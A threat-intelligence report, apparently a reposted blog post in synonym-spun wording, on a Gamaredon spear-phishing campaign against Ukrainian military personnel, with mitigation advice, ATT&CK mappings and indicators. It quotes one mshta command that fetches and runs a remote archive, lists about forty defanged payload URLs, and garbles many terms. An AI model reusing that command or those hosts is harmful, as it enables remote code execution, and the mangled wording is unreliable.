Key Takeaways
- Cyble Analysis and Intelligence Labs (CRIL) recognized an energetic Gamaredon marketing campaign focusing on Ukrainian army personnel by spear-phishing emails.
- The emails embody malicious XHTML attachments, which, when opened, execute obfuscated JavaScript code that downloads a malicious archive to the sufferer’s system.
- This archive accommodates a Home windows shortcut (LNK) file that, when triggered, initiates the execution of a distant .tar archive hosted on TryCloudflare[.]com through mshta.exe.
- The Menace Actors (TAs) leverage TryCloudflare’s one-time tunnel function to anonymously host malicious recordsdata and entry sources remotely with out detection.
- The marketing campaign seems to be large-scale and coordinated, as indicated by the widespread distribution of comparable recordsdata, and it stays ongoing based mostly on the quantity and timing of found samples.
- The inclusion of a 1-pixel distant picture suggests the TAs are monitoring sufferer interactions with the malicious recordsdata, prone to monitor the marketing campaign’s effectiveness.
Government Abstract
Because the Russia-Ukraine battle continues to evolve, we stay vigilant in monitoring rising threats. Beforehand, we tracked the actions of UNC1151, which focused Ukraine’s Ministry of Defence with a malicious Excel doc designed to compromise delicate techniques. Moreover, we noticed UAC-0184’s malware marketing campaign, which deployed the XWORM RAT in opposition to Ukrainian targets, using Python to facilitate DLL sideloading strategies for additional infiltration.
Throughout our investigation, we got here throughout an ongoing marketing campaign of Gamaredon focusing on Ukraine. Gamaredon, also called Primitive Bear or Armageddon, is a Russian-linked Superior Persistent Menace (APT) group that has been energetic since at the very least 2013. It’s identified for its cyber-espionage actions, primarily focusing on Ukrainian authorities establishments, army, and different important infrastructure sectors.
Gamaredon has been concerned in quite a few high-profile campaigns, notably during times of heightened rigidity between Russia and Ukraine. Though its operations have been characterised by way of comparatively low-sophistication instruments, its success is attributed to its persistence and deal with particular geopolitical targets.
In latest months, Gamaredon has intensified its efforts with a large-scale phishing marketing campaign geared toward Ukrainian entities. This marketing campaign entails subtle techniques and widespread phishing makes an attempt, reflecting the continuing and escalating nature of cyber threats amidst the battle. The determine under reveals the Gamaredon pattern noticed because the begin of August 2024.
Amid the continuing Russia-Ukraine conflict, Cyble Analysis and Intelligence Labs (CRIL) encountered a spear-phishing marketing campaign focusing on Ukrainian army personnel. The malicious e-mail accommodates an XHTML attachment that, upon opening, executes a number of malicious actions on the contaminated system. After thorough evaluation, our analysis factors to the Gamaredon APT group because the orchestrator of this assault.
Technical Particulars
The marketing campaign begins with a spear-phishing e-mail bearing the topic “ПОВІСТКА,” which interprets to “summons.” The e-mail is themed round a army summons directed on the recipient and features a malicious XHTML attachment, as proven within the determine under.
Upon opening the XHTML file, the person is introduced with a message in Ukrainian stating, “File uploaded to the ‘DOWNLOADS’ folder.” Concurrently, a RAR compressed folder is silently dropped into the system’s Downloads listing. This motion is designed to mislead the sufferer, making it seem as if a respectable file has been downloaded. The determine under reveals the XHTML message.
The XHTML file accommodates obfuscated JavaScript code that executes upon the person opening the file. Within the XHTML, the JavaScript is embedded inside a `div` factor, with the `div id` set to “jwu.” This obfuscated script consists of a Base64-encoded string blended with a “*” character at random locations to evade detection. The JavaScript execution is triggered through the “onerror” occasion. In some variants, it’s activated by the “onmousemove” occasion, making certain the malicious code runs as quickly because the person interacts with the file. The determine under reveals the obfuscated XHTML code.
The de-obfuscated string inside the “jwu” `div` reveals JavaScript code that accommodates a Base64-encoded 7zip compressed archive disguised with a .rar file extension. This script decodes the Base64 information and saves the 7zip archive to the Downloads folder as “5-2839-2024_29.08.2024.rar.” Moreover, the script retrieves a 1-pixel distant picture, probably serving as a monitoring mechanism to watch the execution and interplay with the malicious file. The determine under reveals the de-obfuscated JavaScript.
The RAR file accommodates a Home windows shortcut (LNK) file. Upon execution, the malicious LNK file triggers the execution of the distant .tar file through mshta.exe. On this marketing campaign, the TAs leveraged the area trycloudflare[.]com to host the malicious tar archives. By exploiting the TryCloudflare service, TAs can set up a one-time tunnel with out the necessity for an account with Cloudflare. This tunnel allows distant entry to sources and information exterior the native community, functioning equally to a VPN or safe shell (SSH) protocol, permitting the attackers to evade conventional detection mechanisms.
The Goal command of the LNK file is talked about under.
- “C:WindowsSystem32mshta.exe hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare.com/tcg/instruct/teacher.tar /f”
The determine under reveals the property of the LNK file.
We had been unable to acquire the .tar recordsdata in our analysis. Nevertheless, based on an evaluation by Cisco Talos, Gamaredon is understood for downloading extra malicious recordsdata designed to steal delicate data from the sufferer’s system.
Conclusion
The continued Gamaredon APT marketing campaign demonstrates the group’s persistence and evolving techniques in focusing on Ukrainian army personnel. By leveraging spear-phishing emails, malicious XHTML attachments, and obfuscated JavaScript, the attackers ship dangerous payloads whereas exploiting TryCloudflare’s one-time tunnel function to host malicious archives. The marketing campaign’s scale and frequency point out a coordinated, mass phishing effort geared toward delicate Ukrainian entities.
Suggestions
The next are the suggestions to Mitigate the Gamaredon APT Marketing campaign.
- Prepare customers to acknowledge spear-phishing makes an attempt, particularly these with suspicious attachments or sudden military-themed content material.
- Implement e-mail safety options with superior menace safety, filtering phishing emails and malicious attachments.
- Deploy anti-malware options able to detecting and blocking obfuscated JavaScript and malicious LNK recordsdata.
- Monitor for uncommon community exercise, together with connections to TryCloudflare tunnels and different unknown exterior sources.
- Use utility whitelisting to permit solely trusted purposes and scripts to run.
- Leverage menace intelligence platforms to dam identified malicious domains, together with these abusing TryCloudflare.
MITRE ATT&CK® Strategies
| Tactic | Method | Process |
| Preliminary Entry (TA0001) | Phishing: Spearphishing Attachment (T1566.001 ) | Gamaredon sends spear-phishing emails with malicious XHTML attachments focusing on Ukrainian army personnel. |
| Execution (TA0002) | Person Execution: Malicious File (T1204.002) | The marketing campaign depends on customers opening the XHTML attachment, which then triggers JavaScript code execution. |
| Execution (TA0002) | Signed Binary Proxy Execution: Mshta (T1053.005) | mshta.exe is used to execute a distant .tar archive file hosted on a compromised cloud service. |
| Defence Evasion (TA0005) | Obfuscated Information or Info (T1027) | The marketing campaign makes use of obfuscated JavaScript hidden within the XHTML file, together with random “*” characters in Base64 encoded strings to keep away from detection. |
Indicators Of Compromise
| Indicator | Indicator Kind | Description |
| 0c823adb18cf2583222e6fbe73c08cac8147d20b02fbe88d51cac2a1c628a30b | SHA256 | XHTML |
| 12bac5853724722330ce7f6b782db13844f8343ccc851fa2db1e93b980a6cf49 | SHA256 | XHTML |
| a4806713db9cf41ab503e046981b8c5e1a9928314bb32545bd104fab2c36b332 | SHA256 | XHTML |
| 0fd6e081172d8576ad2f16ab6360a0086442560aa24ab1f4636a592f279c19ef | SHA256 | XHTML |
| 66de05ae4f4f185a514ad11daac0b7f944748ffa6885a7d7a826def45d305cfe | SHA256 | XHTML |
| 1a6ce74fc1487537936d769243f39b265fd3911e72e7caacaa793f1fffe52296 | SHA256 | XHTML |
| e6d342fde640e5d5d9ef2f470d0f23ed660d7f19cc33470ec40a9f8e9b9c1561 | SHA256 | XHTML |
| 17f66f2b3e2f9ba8c8f739876f99e2d7abc81b264f3015d3de86267f007cc49b | SHA256 | XHTML |
| 10cecb7a032325024b9ba7a0ea5f1a910268078317ca4ca7dae9e06779837631 | SHA256 | XHTML |
| 83d4b0aea975acb7f80417748f179d8ef9ecbba9150b24e3354ef92e17ccf242 | SHA256 | XHTML |
| 201ad0967246bb0a5b3f7aa85f31395e750c0237959d86b9c2d9dbf5fbb951c4 | SHA256 | XHTML |
| d4df2899a4569f7cb9ac5edce6b4eef8eba3031b7f96f74552734362afea18b7 | SHA256 | XHTML |
| 95beb4bd1a94c8db58dddeb926f656003e1dca2c66d04870380445b23840b536 | SHA256 | XHTML |
| 13f065a592246074d7d929dd4f977d247a69efa9e1dbbe3613f81d3d8f39d6f4 | SHA256 | XHTML |
| a1d689a0839a143e371242fb217db82e0cbdfeff4daa49e6ffe5c5b3375fae3d | SHA256 | XHTML |
| 4b1d8e58c866a8b12e8987559287592ee54a482328e8c03d5666a761bcf10f92 | SHA256 | XHTML |
| db63ca233296a239e4b8d7f28b2db776596bcb645d3958bc4b3447074d7635b9 | SHA256 | XHTML |
| 2da9941aae860aaa2d3bb7208c900549464955733457f529014d945a24737e79 | SHA256 | XHTML |
| 2636907826c9bc27ee4c7519979c0add5ad981e71edf7eb53002b8ab89fc8142 | SHA256 | XHTML |
| e18955f5a9fb6abb30fd5dcbc840d34cce9bb1c70552cc36941139fc6e7304b5 | SHA256 | XHTML |
| 0ae813d5ea1c0114795174a48b57a90c0f719485e3c733bbd5403c77dab29298 | SHA256 | XHTML |
| 71e02cfc2c871768b8ae5ad9af9e9cb664e0a66be3f3c8d050b6d58f3cd4c07a | SHA256 | XHTML |
| ad2c0c8d14d782610ed7173a5d0b4bd13524ceb1027d070a1cda312cfd60983a | SHA256 | XHTML |
| 1cbd7696840ec6a3442a8bf4f7deb545bbeeee68fb27e4352197953af976cf2a | SHA256 | XHTML |
| 0a4bcecdee823cc3c2d4ae2d5569edca7bc8372f5d37f62083782e92732a63c8 | SHA256 | XHTML |
| afa7a8bb0cb0508f579b936488bbfff0142d458c26ef98904cb06e98f6b50f81 | SHA256 | XHTML |
| 265042be55ec0082a500a24cdb5da8b289c42116e23eddcfc80dfd24019f6412 | SHA256 | XHTML |
| 1b3db58482ad147faeda64eced7648bee08bfc78194e3f7bcb52cf1860d07a04 | SHA256 | XHTML |
| 821ee2a91cca1e17f890e099ee41a47cc5943149a10e81467e57803d6d5b02de | SHA256 | XHTML |
| 0e1eb8a5f850bc7712f78adcfe6c7c29215ea620ad2c36a0795016f0299d6ea4 | SHA256 | XHTML |
| f9662c14db97db311d71b00ce33a41bbc4bc4ab6f05d8ccd99562e773d8948b1 | SHA256 | XHTML |
| c7802521935c6dc3dc81e15ac952b9782ca1743dcd9e4e11030f0957d8f2a156 | SHA256 | XHTML |
| 56188e68f6f6bba34f6771056859f1a7232edef264fbe67e0c8b30c1ca569259 | SHA256 | XHTML |
| a620f9af481001e2d96a2d210f086fa144731a1b95db32addcd148e09a627374 | SHA256 | XHTML |
| df124b73f309e634ca7c226c5e1ae2545f45907a88a40249c8ac1d5e40eca43f | SHA256 | XHTML |
| f94817a02884f73f9ed462c67581cda4fc169568f7636f01237a25da3df93d7c | SHA256 | XHTML |
| 5f7173cd548b227206e70419739a2f6ca4087ef693297b9b67a29fbcb4d1e928 | SHA256 | XHTML |
| f59715593679ff13e92e14f8f98c6ead1cbe678f3a5ac28de8085c1a7132b02c | SHA256 | XHTML |
| 58d6c125ccab32414f63ba62cc7ba4a2500a0d2890506069ba7e0ac166799491 | SHA256 | XHTML |
| 51427e20fc02cb04948c2ab53378beb52727a6a84570f880aeaebd6be27f1dad | SHA256 | XHTML |
| bbc97c086436385c32b0ac5f6cf35e7446f0e12e0412ed090e7099b873837795 | SHA256 | XHTML |
| a7d060ea2dfd98f723aff909e5c88c3d8d3d54d96e5f6e7a09aad1de8d8ef10b | SHA256 | XHTML |
| cba52f16695dc3d80a98c560a7614a3f91aaea242344b423b260d06362a2c9e0 | SHA256 | XHTML |
| ab333d21c0fa8fe5b6cd620736fb04d7af53a6a0be604066617a1374fa7baa78 | SHA256 | XHTML |
| a4b912413e39b4307613c8941af258750782e77d820c172155dfaaee6b32d2db | SHA256 | XHTML |
| c863155cf6a39a376eef232737ba2922e324d8b05de36ddebe4068060b09a498 | SHA256 | XHTML |
| bee43c5f1a714fdef911e5dc99fe27854f5db00de859dddc09e720eb56e1c53e | SHA256 | XHTML |
| ca7a5daf2528233dae5c38d929a07ef30d5ca7d349df2ce842d795311f22fa2f | SHA256 | XHTML |
| 770223d8c0c7d5abd4d6c0215cf9479f7a0e32a1dfaaa3b42c71dfe26ccb986f | SHA256 | XHTML |
| dacb0c04579116f6245ca0ee69a5d328c3f23e5d0c5f579133070fe0f06659d1 | SHA256 | XHTML |
| 0a06f536d08150ce6ea521a563fd321229b9e044ce993f9a667336a34d838b3f | SHA256 | XHTML |
| 57dd02447cf705fe570ed6b3051f3bff06e8506360ba667e02731332d04eb37c | SHA256 | XHTML |
| 0e0ce820f8b5deae3755ed372a0b898861a4cc7cb70cfd90197452773b078452 | SHA256 | XHTML |
| dbdff73a7a6e6eae23c8cd5093b3df11f39cddf86e48b651e68c329df59ee0e8 | SHA256 | XHTML |
| c32f28fc87f8efcd3f9c044f1898f3e712d4b4802c99df1525644ebfb3df2f2d | SHA256 | XHTML |
| e867ce12e119eebe53de1acccd99fca09a9802d1432d31dafaf5d76b8a87f099 | SHA256 | XHTML |
| 92ee588be70e23ca459627ae22f05fba11589eeaeed0f8dd153416d952bb57e0 | SHA256 | XHTML |
| 1ab3b99af98b7d9fb13d5b6acfc1bf3f4aa2a751bea58ba060f386509ccc73d3 | SHA256 | XHTML |
| b8f91aae00889eda914ef72b99688e920e113fb3723607250d2a1c949effaac3 | SHA256 | XHTML |
| b95eea2bee2113b7b5c7af2acf6c6cbde05829fab79ba86694603d4c1f33fdda | SHA256 | XHTML |
| 7525cd06447204ce72e5d24eb1e96c142d72f9f8f5339d61b6151f430bda2dae | SHA256 | XHTML |
| be801d78c112fae7a1cec1d20e1f2a85f28987d15c825c1773860bc7e99c5e87 | SHA256 | XHTML |
| de2f0a2aafacfee9d7989cdafd0617211a44d320b0fba6c488f480d92dab0891 | SHA256 | XHTML |
| 66d30cc00a2445c5527049875e43c2c85a8995a0983502cd5e0276235bab8040 | SHA256 | XHTML |
| 450badddfae09a3eedb613e59f9a18d69632ee28d5e59e52c6d4bae151225f87 | SHA256 | XHTML |
| d55a4a4596908abc5742f43e9b44b23951935feead10de52f3916ac5fd811a80 | SHA256 | XHTML |
| 7cdf0df1284b75a7d4e945d1d6a707c65e3527ae38aea7c9d82163c019c8203c | SHA256 | XHTML |
| 37c7adb7a719ec99c54b86faad0a2e5164599f0b85ecbc07683b89da0355c655 | SHA256 | XHTML |
| efceb2cb0d0a332a630c04a8bce6f0e5dedd297ce7c0943f3783ee0749342ef3 | SHA256 | XHTML |
| ce040948011f0ccc9309ab2cb08c7a80bf0337415818cf916e6e2e7ed70ed49e | SHA256 | XHTML |
| 5938c03b725f37f68ebf950edf4fd5688900e273ee0a55c305ff4fd9995d03b1 | SHA256 | XHTML |
| 112bd0f71522e05c21ad249a20534fb8d3306a73f5c39dd44bfb9e198a96e9f8 | SHA256 | XHTML |
| cbfe9331e8a1b36f8e5be68f6588a6a116dfd63b474fcac618bc75854535e699 | SHA256 | XHTML |
| c449c4be65021a4563da97ae4f150bed4f388236031d33e17953b7d6666381e1 | SHA256 | XHTML |
| 6c1e4a444e40b27db722be2321eb1c69455251940b30f0e2232103015b7af3cc | SHA256 | XHTML |
| 11b0f2bbb811f42dd463c247401fddd9c2efb2708b9be142573597ee869da29a | SHA256 | XHTML |
| 7c2bbaaa90b7f66b9ccfb3136905e8d07d8c8f1542aa605844319992a39133c9 | SHA256 | XHTML |
| 982dac7a43329d6e204e74d87d60c08e94ba3a46ccf36445b218b86f05e44a90 | SHA256 | XHTML |
| 5a70f39a3d87469146b0a8a92086675dc15e483aa412a0a9aa5dc9809bf8f22f | SHA256 | XHTML |
| 663c6f08b3aedb4323e0f73cab526ddcc1f6de53ea7084712940c1cb54d75ab0 | SHA256 | XHTML |
| hxxps://newbie-housewives-poxxer-trailers[.]trycloudflare[.]com/zgur/preservation/chosen[.]rar | URL | Malicious URL |
| hxxps://newbie-housewives-poxxer-trailers[.]trycloudflare[.]com/zgur/seeing/prayers[.]rar | URL | Malicious URL |
| hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/common/presence[.]tar | URL | Malicious URL |
| hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/previous/baron[.]tar | URL | Malicious URL |
| hxxps://tracked–radar-ni[.]trycloudflare[.]com/zgur/sensation/gravestone[.]rar | URL | Malicious URL |
| hxxps://cod-identification-imported-carl[.]trycloudflare[.]com/f/precaution[.]rtf | URL | Malicious URL |
| hxxps://strange-hunger-appeared-res[.]trycloudflare[.]com/uss/senior/refuge[.]tar | URL | Malicious URL |
| hxxps://strange-hunger-appeared-res[.]trycloudflare[.]com/gss/quest/presents[.]tar | URL | Malicious URL |
| hxxps://nobody-principal-long-un[.]trycloudflare[.]com/pov/determine/barn[.]tar | URL | Malicious URL |
| hxxps://molecular-throw-process-dealtime[.]trycloudflare[.]com/gss/quietly/vendor[.]tar | URL | Malicious URL |
| hxxps://tracked–radar-ni[.]trycloudflare[.]com/zgur/questions/preponderant[.]rar | URL | Malicious URL |
| hxxps://tracked–radar-ni[.]trycloudflare[.]com/psvr/decay/barefooted[.]rar | URL | Malicious URL |
| hxxps://newbie-housewives-poxxer-trailers[.]trycloudflare[.]com/psvr/rejoined/web[.]rar | URL | Malicious URL |
| hxxps://sunrise-massive-joseph-commodities[.]trycloudflare[.]com/zsvr/sentiment/banisters[.]rar | URL | Malicious URL |
| hxxps://wp-acm-configuration-fm[.]trycloudflare[.]com/uss/development/days[.]tar | URL | Malicious URL |
| hxxps://nobody-principal-long-un[.]trycloudflare[.]com/pov/consumption/discount[.]tar | URL | Malicious URL |
| hxxps://strange-hunger-appeared-res[.]trycloudflare[.]com/uss/discount/barton[.]tar | URL | Malicious URL |
| hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare[.]com/tcul/based mostly/guarded[.]tar | URL | Malicious URL |
| hxxps://tracked–radar-ni[.]trycloudflare[.]com/sudu/inadequate/impartial[.]rar | URL | Malicious URL |
| hxxps://tracked–radar-ni[.]trycloudflare[.]com/sudu/determine/quest[.]rar | URL | Malicious URL |
| hxxps://australian-prepared-derek-hands[.]trycloudflare[.]com/vo/nervous/bar[.]tar | URL | Malicious URL |
| hxxps://bush-worcester-houses-statements[.]trycloudflare[.]com/sudu/headlong/headache[.]rar | URL | Malicious URL |
| hxxps://expertise-sir-designs-columbus[.]trycloudflare[.]com/tu/misplaced/web[.]tar | URL | Malicious URL |
| hxxps://australian-prepared-derek-hands[.]trycloudflare[.]com/vomr/regards/bananas[.]tar | URL | Malicious URL |
| hxxps://australian-prepared-derek-hands[.]trycloudflare[.]com/vg/calm down/shortly[.]tar | URL | Malicious URL |
| hxxps://nobody-principal-long-un[.]trycloudflare[.]com/pov/preparations/sequel[.]tar | URL | Malicious URL |
| hxxps://charter-blond-desired-promptly[.]trycloudflare[.]com/gmm/base/assure[.]tar | URL | Malicious URL |
| hxxps://wp-acm-configuration-fm[.]trycloudflare[.]com/uss/heap/September[.]tar | URL | Malicious URL |
| hxxps://expertise-sir-designs-columbus[.]trycloudflare[.]com/tu/develop/precaution[.]tar | URL | Malicious URL |
| hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare[.]com/tcg/instruct/teacher[.]tar | URL | Malicious URL |
| hxxps://axxribute-homework-generator-lovers[.]trycloudflare[.]com/onp/decent2/first rate[.]tar | URL | Malicious URL |
| hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare[.]com/tcu/headphones/bananas[.]tar | URL | Malicious URL |
| hxxps://infected-gc-rhythm-yu[.]trycloudflare[.]com/ug/insurance coverage/predicate[.]tar | URL | Malicious URL |
| hxxps://mind-apple-slightly-twiki[.]trycloudflare[.]com/ug/daytime2/daytime[.]tar | URL | Malicious URL |
| hxxps://infected-gc-rhythm-yu[.]trycloudflare[.]com/ug/fast/prediction[.]tar | URL | Malicious URL |
| hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/seeming/quay[.]tar | URL | Malicious URL |
| hxxps://longitude-powerpoint-geek-upgrade[.]trycloudflare[.]com/sg/precision2/precision[.]tar | URL | Malicious URL |
| hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/areas/headmaster[.]tar | URL | Malicious URL |
The submit Spear-Phishing within the Battlefield: Gamaredon’s Ongoing Assault on Ukraine’s Army appeared first on Cyble.
